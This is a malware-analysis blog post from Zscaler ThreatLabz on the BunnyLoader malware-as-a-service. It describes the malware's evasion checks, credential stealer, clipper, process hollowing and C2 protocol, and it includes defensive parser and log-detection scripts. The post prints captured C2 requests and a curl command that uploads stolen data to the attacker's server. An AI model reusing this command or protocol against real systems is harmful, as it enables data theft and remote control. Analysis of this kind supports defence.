Effective URL: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
BUNNYLOADER, THE NEWEST MALWARE-AS-A-SERVICE

NIRAJ SHIVTARKAR, SATYAM SINGH
September 29, 2023 - 11 min read



Contents

 1. Introduction
 2. Key Takeaways
 3. Basics
 4. C2 Panel
 5. Technical Analysis
 6. Conclusion
 7. Zscaler Sandbox Coverage
 8. Indicators of Compromise (IOCs)
 9. More blogs


INTRODUCTION

In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service
(MaaS) threat called “BunnyLoader” being sold on various forums. BunnyLoader
provides various functionalities such as downloading and executing a
second-stage payload, stealing browser credentials and system information, and
much more. BunnyLoader employs a keylogger to log keystrokes and a clipper to
monitor the victim’s clipboard and replace cryptocurrency wallet addresses with
actor-controlled cryptocurrency wallet addresses. Once the information is
obtained, BunnyLoader encapsulates the data into a ZIP archive and transmits
the pilfered data to a command-and-control (C2) server. In this blog, we
describe how BunnyLoader works and its technical components.


KEY TAKEAWAYS

 * ThreatLabz identified a new malware loader written in C/C++ named
   “BunnyLoader” sold on various forums for $250.
 * BunnyLoader is under rapid development with multiple feature updates and bug
   fixes.
 * BunnyLoader employs various anti-sandbox techniques during its attack
   sequence.
 * BunnyLoader downloads and executes a second-stage payload, logs keys, steals
   sensitive information and cryptocurrency, and executes remote commands.


BASICS

In early September, ThreatLabz came across a new malware loader named
BunnyLoader. The malware was being sold on various forums by a user named
“PLAYER_BUNNY”/”PLAYER_BL”, who seems to be one of the developers of the loader
as shown in the figure below.

Figure 1: BunnyLoader advertisement from criminal forums.

Based on the advertisement, BunnyLoader has the following features:

 * Written in C/C++
 * Fileless loader - download & execute further malware stages in memory
 * Consists of stealer and clipper capabilities
 * Remote command execution
 * Incorporates anti-analysis techniques
 * Provides a web panel showcasing stealer logs, total clients, active tasks and
   much more
 * Price - $250 (Lifetime)

Since BunnyLoader’s v1.0 initial release on September 4, 2023, the malware has
been under rapid development, with many feature updates and bug fixes released
between September 4 and the time this blog was written (September 29, 2023).
The release history below shows that BunnyLoader’s updates address bugs,
change the C2 panel, and even introduce new pricing tiers.

BunnyLoader release history (version - date of release, followed by the updates):

BunnyLoader v1.0 - Sept 4, 2023
 * N/A

BunnyLoader v1.1 - Sept 5, 2023
 * Client bug
 * Compress stealer logs before uploading
 * Command added for reverse shell: pwd

BunnyLoader v1.2 - Sept 6, 2023
 * Added browser history recovery to stealer
 * Added NGRok auth-token recovery to stealer
 * Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio,
   Iridium, Maxthon3)

BunnyLoader v1.3 - Sept 9, 2023
 * Added credit card recovery to stealer function
 * Added support for 16 different credit card types
 * Fix C2 bugs

BunnyLoader v1.4 - Sept 10, 2023
 * Implemented AV evasion

BunnyLoader v1.5 - Sept 11, 2023
 * Added VPN recovery to stealer (ProtonVPN & OpenVPN)
 * Fix fileless loader bugs
 * Optimization in loading logs

BunnyLoader v1.6 - Sept 12, 2023
 * Added downloads history viewer to stealer
 * Added anti-sandbox techniques

BunnyLoader v1.7 - Sept 15, 2023
 * Implemented additional AV evasion

BunnyLoader v1.8 - Sept 15, 2023
 * Implemented keylogger functionality
 * Bug fixes in execution of tasks
 * Fix C2 bugs

BunnyLoader v1.9 - Sept 17, 2023
 * Added game recovery to stealer (Uplay & Minecraft)
 * Added 5 Chromium browser paths
 * Added 1 desktop wallet recovery to stealer

BunnyLoader v2.0 - Sept 27, 2023
 * C2 GUI Changes
 * Fix critical vulnerabilities - SQL injection in the C2 Panel which would give
   access to the database and XSS vulnerabilities fixed
 * Major bugs fixed
 * C2 will detect and block exploit attempts
 * Optimization in stealer
 * Optimization in fileless loader
 * Selling private stub:
   * Advanced and proactive anti-analysis
   * Inject payload into memory (support x86/x64)
   * AV evasion
   * Persistence
 * New prices:
   * Payload - $250
   * Payload + Stub - $350


C2 PANEL

The BunnyLoader C2 panel showcases a list of various tasks including:

 * downloading and executing additional malware 
 * keylogging
 * stealing credentials 
 * manipulating a victim’s clipboard to steal cryptocurrency
 * running remote commands on the infected machine 

The parameters consisting of the download URL and the cryptocurrency wallet
addresses are added in the panel as shown below.

Figure 2: A screenshot of the BunnyLoader C2 panel configuration.

The BunnyLoader panel also provides:

 * statistics for infections
 * the total connected/disconnected clients
 * active tasks
 * stealer logs

This information can also be cleared from the panel.

Figure 3: A screenshot of the statistics and options to clear data in the
BunnyLoader C2 panel.

In addition, the infected machines can be controlled remotely through the C2
panel, as shown in the screenshot below.

Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems.


TECHNICAL ANALYSIS

In the following section, we will analyze a malware sample of BunnyLoader. Upon
execution of BunnyLoader, the loader performs the following actions:

 1. Creates a new registry value named “Spyware_Blocker” in the Run registry key
    (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the
    value is the path to the BunnyLoader binary. This registry value allows
    BunnyLoader to maintain persistence on the machine.
 2. Hides the window using ShowWindow() with nCmdShow set to SW_HIDE
 3. Creates a mutex named “BunnyLoader_MUTEXCONTROL” via CreateMutexW()
 4. Performs the following anti-VM techniques:
    * Checks for the following loaded modules and exported functions:
      * SxIn.dll - 360 Total Security
      * cmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus
      * wine_get_unix_file_name - Detects Wine
      * SbieDll.dll - Sandboxie
    * Checks for a VM using WMI queries against the “ROOT\CIMV2” namespace:
      * SELECT * FROM Win32_VideoController
      * Win32_Processor
      * Win32_NetworkAdapter
      * Win32_BIOS
      * SELECT * FROM Win32_ComputerSystem
    * Checks for a Docker container via “/proc/1/cgroup” - if the container
      exists, BunnyLoader does not perform further malicious actions.
    * Checks for the following blacklisted sandbox usernames:
      * ANYRUN
      * Sandbox
      * Test
      * John Doe
      * Abby
      * Timmy
      * Maltest
      * malware
      * Emily
      * Timmy
      * Paul Jones
      * CurrentUser
      * IT-ADMIN
      * Walker
      * Lisa
      * WDAGUtilityAccount
      * Virus
      * fred

If a sandbox is identified, BunnyLoader throws the following error message: 

“The version of this file is not compatible with the current version of Windows
you are running. Check your computer's system information to see whether you
need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact
the software publisher.”

Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as
shown below:

--------------------------------------------------------------------------------

GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8

Connected

--------------------------------------------------------------------------------

The registration request sent to the C2 server (shown above) contains the
following information:

Information in the C2 server request (value - description):

 * country - Gathers the country where the infected system is connecting from
   via “http[:]//ip-api.com/csv” where the user agent is “BunnyRequester”
 * ip - Gathers the victim IP from “http[:]//api.ipify.org” where the user
   agent is “BunnyRequester”
 * host - Gathers the hostname via GetComputerNameA
 * ver - The version of BunnyLoader (e.g., 2.0)
 * system - Fetches the operating system via “systeminfo | findstr /B /C:"OS Name"”
 * privs - Fetches the privileges of the current user via OpenProcessToken.
   Sends “Admin” if the user is an administrator, otherwise sends the string
   “user”.
 * av - Gathers the anti-virus on the infected machine via
   wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value

The user agent for the request is set to “BunnyLoader”. If the response from the
C2 is “Connected”, BunnyLoader performs the core malicious actions.

Task Execution

After registration, BunnyLoader sends a task request to the C2 server
“http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the
user agent as “BunnyTasks”. As shown below, the response to the task request
consists of the “ID”, “Name” and “Params”.

--------------------------------------------------------------------------------

GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8

ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k

--------------------------------------------------------------------------------

Here the “Name” is the module (functionality) to be executed and the “Params”
are the parameters passed to the module. Note that several tasks can be
concatenated in a single response with no separator, as in the example above
(a “Run Stealer” task with empty parameters followed by a “Bitcoin” clipper
task). Based on the module name received in the task response, BunnyLoader
further performs its actions.
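The task response format above is a flat “ID: … Name: … Params: …” string with several tasks run together, which is awkward to consume in a sandbox or C2 emulator. The following parser is an added example written for this blog, not BunnyLoader or Zscaler code; the sample response is constructed from the one shown above with a placeholder wallet address, and the task-name-to-family map is taken from the task list that follows.

```python
import re
from dataclasses import dataclass

# Task names listed in the blog, grouped by module family. Anything not in the
# map (e.g. a remote command execution task) is reported as "unknown".
TASK_FAMILIES = {
    "Download and Execute (Fileless Execution)": "Trojan Downloader",
    "Download and Execute (Disk Execution)": "Trojan Downloader",
    "Run Keylogger": "Intruder",
    "Run Stealer": "Intruder",
    "Bitcoin": "Clipper", "Monero": "Clipper", "Ethereum": "Clipper",
    "Litecoin": "Clipper", "Dogecoin": "Clipper", "ZCash": "Clipper",
    "Tether": "Clipper",
}

# One match per "ID: .. Name: .. Params: .." triple. Params runs until the next
# "ID: <n> Name:" marker or the end of the body, so an empty Params (as in the
# "Run Stealer" task) is handled without swallowing the following task.
TASK_RE = re.compile(
    r"ID:\s*(?P<id>\d+)\s+Name:\s*(?P<name>.+?)\s+Params:\s*"
    r"(?P<params>.*?)(?=\s*ID:\s*\d+\s+Name:|\Z)",
    re.DOTALL,
)


@dataclass
class Task:
    task_id: int
    name: str
    params: str
    family: str


def parse_task_response(body: str) -> list[Task]:
    """Split a TaskHandler.php response body into individual tasks."""
    tasks = []
    for m in TASK_RE.finditer(body):
        name = m.group("name").strip()
        tasks.append(Task(int(m.group("id")), name, m.group("params").strip(),
                          TASK_FAMILIES.get(name, "unknown")))
    return tasks


def group_by_family(tasks: list[Task]) -> dict[str, list[str]]:
    """Summarise which module families a response activates (for triage)."""
    out: dict[str, list[str]] = {}
    for t in tasks:
        out.setdefault(t.family, []).append(t.name)
    return out


# Constructed sample: same layout as the response in the blog, with a
# placeholder in place of the actor's Bitcoin address.
SAMPLE_RESPONSE = ("ID: 5 Name: Run Stealer Params: "
                   "ID: 3 Name: Bitcoin Params: bc1qPLACEHOLDERADDRESS5k")

if __name__ == "__main__":
    for task in parse_task_response(SAMPLE_RESPONSE):
        print(f"task {task.task_id}: {task.family} / {task.name!r} "
              f"params={task.params!r}")
```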

BunnyLoader consists of the following tasks:

 * Trojan Downloader
   * Download and Execute (Fileless Execution)
   * Download and Execute (Disk Execution)
 * Intruder
   * Run Keylogger
   * Run Stealer
 * Clipper
   * Bitcoin
   * Monero
   * Ethereum
   * Litecoin
   * Dogecoin
   * ZCash
   * Tether
 * Remote Command Execution

Run Keylogger Task

BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging
key strokes. The output of the keylogger is stored in the file
“C:\Users\<username>\AppData\Local\Keystrokes.txt”.

Run Stealer Task

BunnyStealer is designed to steal information related to web browsers,
cryptocurrency wallets, VPNs and much more. Eventually the stolen information is
stored in a folder named “BunnyLogs” in the Appdata\Local Directory, which is
compressed as a ZIP archive, and exfiltrated to the C2 server. The following are
the web browsers targeted by BunnyLoader:

 * 7Star\7Star\User Data
 * Yandex\YandexBrowser\User Data
 * CentBrowser\User Data
 * Comodo\User Data
 * Chedot\User Data
 * 360Browser\Browser\User Data
 * Vivaldi\User Data
 * Maxthon3\User Data
 * Kometa\User Data
 * K-Melon\User Data
 * Elements Browser\User Data
 * Google\Chrome\User Data
 * Sputnik\Sputnik\User Data
 * Epic Privacy Browser\User Data
 * Nichrome\User Data
 * uCozMedia\Uran\User Data
 * CocCoc\Browser\User Data
 * Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
 * Uran\User Data
 * CatalinaGroup\Citrio\User Data
 * Chromodo\User Data
 * Coowon\Coowon\User Data
 * Mail.Ru\Atom\User Data
 * liebao\User Data
 * Microsoft\Edge\User Data
 * QIP Surf\User Data
 * BraveSoftware\Brave-Browser\User Data
 * Orbitum\User Data
 * Chromium\User Data
 * Comodo\Dragon\User Data
 * Google(x86)\Chrome\User Data
 * Amigo\User\User Data
 * MapleStudio\ChromePlus\User Data
 * Torch\User Data
 * Iridium\User Data

BunnyLoader steals the following information from these web browsers:

 * AutoFill data
 * Credit cards
 * Downloads
 * History
 * Passwords

The malware targets the following cryptocurrency wallets:

 * Armory
 * Exodus
 * AutomaticWallet
 * Bytecoin
 * Ethereum
 * Coinomi
 * Jaxx
 * Electrum
 * Guarda

BunnyLoader steals credentials from the following VPN clients:

 * ProtonVPN 
 * OpenVPN

Credentials are also stolen from the following messaging applications:

 * Skype
 * Tox
 * Signal
 * Element
 * ICQ

Examples of the stolen information are shown in the figure below. The logs
consist of an information.txt file which contains system information along with
the information related to the location of the infected machine. Each folder
contains the corresponding data stolen from the system. For example, the Browser
folder contains the web browser history and downloaded file information.

Figure 5: A screenshot of the information exfiltrated by BunnyLoader.

The stolen data is archived with PowerShell using System.IO.Compression.ZipFile
under the filename “BunnyLogs_<hostname>.zip”. The ZIP archive is exfiltrated
to the C2 server via the following curl command:

--------------------------------------------------------------------------------

cmd.exe /c curl -F
"file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip"
http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php

--------------------------------------------------------------------------------

BunnyLoader also performs a stealer registration request containing statistics
related to the stolen information and the link to the exfiltrated logs with the
user agent: “BunnyStealer”, as shown below:

--------------------------------------------------------------------------------

GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Microsoft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&link=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

--------------------------------------------------------------------------------

Clipper Task

The BunnyLoader clipper module checks a victim's clipboard for content matching
cryptocurrency addresses and replaces them with a wallet address controlled by
the threat actor.

In this case, the targeted cryptocurrencies are: 

 * Bitcoin
 * Monero
 * Ethereum
 * Litecoin
 * Dogecoin
 * ZCash
 * Tether

The clipper receives the cryptocurrency wallet addresses to replace from the C2
server.

Download and Execute Task

BunnyLoader performs two types of download and execute functions. 

 * The first type is downloading a file from a URL provided by the C2, which is
   written to disk in the AppData\Local directory and further executed. 
 * The second type uses fileless execution, where BunnyLoader creates a
   “notepad.exe” process in a suspended state and then downloads the payload
   from the received URL with the user agent “BunnyLoader_Dropper”. The
   downloaded binary is stored in a memory buffer and BunnyLoader performs
   Process Hollowing to inject the downloaded payload into the “notepad.exe”
   process as shown in the figure below.

Figure 6: A screenshot of BunnyLoader fileless download and executing code.

After the tasks are completed, BunnyLoader sends the following task completion
request with the user agent as “TaskCompleted” and the CommandID as the Task ID.
An example task completion request is shown below:

--------------------------------------------------------------------------------

http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461

--------------------------------------------------------------------------------

Remote Command Execution Task

BunnyLoader performs remote command execution from the C2 panel. BunnyLoader
receives the commands to be executed on the infected machine via an “echoer”
request to the C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php)
with the user agent set to “BunnyTasks”, as shown in the figure below.
BunnyLoader parses the response and checks for the built-in commands “help”,
“cd” and “pwd”; any other command is executed using _popen. The command output
is sent to the C2 server as the “&value=” parameter of a result request (e.g.,
http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent
“BunnyShell”.

Figure 7: A screenshot of BunnyLoader remote command execution.

BunnyLoader also performs a heartbeat request in order to inform the C2 that the
infected system is online as shown below. The user agent for the heartbeat is
“HeartBeat_Sender”.

--------------------------------------------------------------------------------

GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8

Client online


--------------------------------------------------------------------------------
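Taken together, the registration, task, upload, stealer registration, shell and heartbeat requests above share two stable traits: a small set of fixed user agents and a fixed set of endpoints under /Bunny/. The script below is an added example, not Zscaler tooling, that runs those indicators over constructed proxy log lines; the log layout (`<timestamp> <client-ip> <method> <url> "<user-agent>"`) is an assumption for the example, while the C2 address, endpoints and user agents are the ones documented in this post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# User agents documented in the blog for each BunnyLoader request type.
BUNNY_USER_AGENTS = {
    "BunnyLoader": "C2 registration",
    "BunnyRequester": "public IP / country lookup",
    "BunnyTasks": "task poll or shell command fetch",
    "BunnyStealer": "stealer registration",
    "BunnyLoader_Dropper": "second-stage download",
    "TaskCompleted": "task completion report",
    "BunnyShell": "shell command output",
    "HeartBeat_Sender": "heartbeat",
}

# C2 endpoints documented in the blog (all under /Bunny/ on the C2 host).
BUNNY_ENDPOINTS = {
    "/Bunny/Add.php", "/Bunny/TaskHandler.php", "/Bunny/Uploader.php",
    "/Bunny/StealerRegistration.php", "/Bunny/Echoer.php",
    "/Bunny/ResultCMD.php", "/Bunny/Heartbeat.php",
}

# Assumed proxy log layout (constructed for this example, not a vendor format):
#   <timestamp> <client-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def analyze_line(line):
    """Return an alert dict if the line matches a BunnyLoader indicator, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    parts = urlsplit(url)
    reasons = []
    if ua in BUNNY_USER_AGENTS:
        reasons.append(f"user-agent {ua!r}: {BUNNY_USER_AGENTS[ua]}")
    # The ZIP upload is sent by curl.exe, so its user agent is not a Bunny one;
    # the endpoint rule is what catches that request.
    if parts.path in BUNNY_ENDPOINTS:
        reasons.append(f"C2 endpoint {parts.path}")
    if not reasons:
        return None
    # Registration-style requests carry host/privs/av/ver as query parameters;
    # strip() removes the trailing newline the malware leaves in "system".
    fields = {k: v[0].strip() for k, v in parse_qs(parts.query).items()}
    return {"time": ts, "client": client, "method": method,
            "c2_host": parts.hostname, "path": parts.path,
            "reasons": reasons, "fields": fields}


def scan(lines):
    """Run analyze_line over every log line, keeping only the alerts."""
    return [a for a in (analyze_line(l) for l in lines) if a]


def endpoints_per_client(alerts):
    """Map each client IP to the sorted list of C2 endpoints it touched."""
    out = {}
    for a in alerts:
        out.setdefault(a["client"], set()).add(a["path"])
    return {c: sorted(p) for c, p in out.items()}


# Constructed sample log: the C2 address and URL layouts come from the blog;
# timestamps, client IP, hostname and the benign request are made up.
SAMPLE_LOG = [
    '2023-09-25T21:11:41Z 10.0.0.5 GET http://37.139.129.145/Bunny/Add.php?country=DE&ip=203.0.113.7&host=WS01&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender "BunnyLoader"',
    '2023-09-25T21:11:42Z 10.0.0.5 GET http://37.139.129.145/Bunny/TaskHandler.php?BotID=272148461 "BunnyTasks"',
    '2023-09-25T21:11:45Z 10.0.0.5 GET https://www.example.com/index.html "Mozilla/5.0"',
    '2023-09-25T21:47:50Z 10.0.0.5 POST http://37.139.129.145/Bunny/Uploader.php "curl/8.0.1"',
    '2023-09-25T21:50:00Z 10.0.0.5 GET http://37.139.129.145/Bunny/Heartbeat.php?country=DE&ip=203.0.113.7&host=WS01&ver=2.0 "HeartBeat_Sender"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["path"],
              "; ".join(alert["reasons"]))
```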

 


CONCLUSION

BunnyLoader is a new MaaS threat whose operators are continuously evolving its
tactics and adding new features to carry out successful campaigns against their
targets. The Zscaler ThreatLabz team will continue to monitor these attacks to
help keep our customers safe.

ZSCALER SANDBOX COVERAGE

Figure 10: Zscaler Sandbox detecting BunnyLoader.

Win32.Downloader.BunnyLoader


INDICATORS OF COMPROMISE (IOCS)

C2 Server - 37[.]139[.]129[.]145/Bunny/

BunnyLoader samples:

 * dbf727e1effc3631ae634d95a0d88bf3
 * bbf53c2f20ac95a3bc18ea7575f2344b
 * 59ac3eacd67228850d5478fd3f18df78





